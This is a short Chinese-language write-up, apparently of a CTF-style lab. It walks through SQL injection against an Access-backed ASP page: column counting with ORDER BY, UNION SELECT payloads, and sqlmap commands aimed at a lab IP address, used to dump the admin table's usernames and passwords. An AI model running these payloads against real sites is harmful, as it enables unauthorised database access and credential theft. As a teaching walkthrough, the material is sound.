打开题目熟悉的界面
用order by 测试后有四列。
这里要说一下Access数据库的结构
Access数据库
表名
列名
数据
注意:Access数据库只有一个数据库。
手工猜数据库名为admin
id=1 and 1=2 union select 1,2,3,4 from admin
发现对了当然可以用sqlmap爆破
sqlmap -u "http://219.153.49.228:44727/new_list.asp?id=1" --tables
列名同样可以猜和用sqlmap爆破
sqlmap -u "http://219.153.49.228:44727/new_list.asp?id=1" --column -T admin
得到后就在回显的2,3查找username和passwd
下面展示一些 内联代码片
。
id=1 and 1=2 union select 1,username,passwd,4 from admin
得到账号密码登录获得key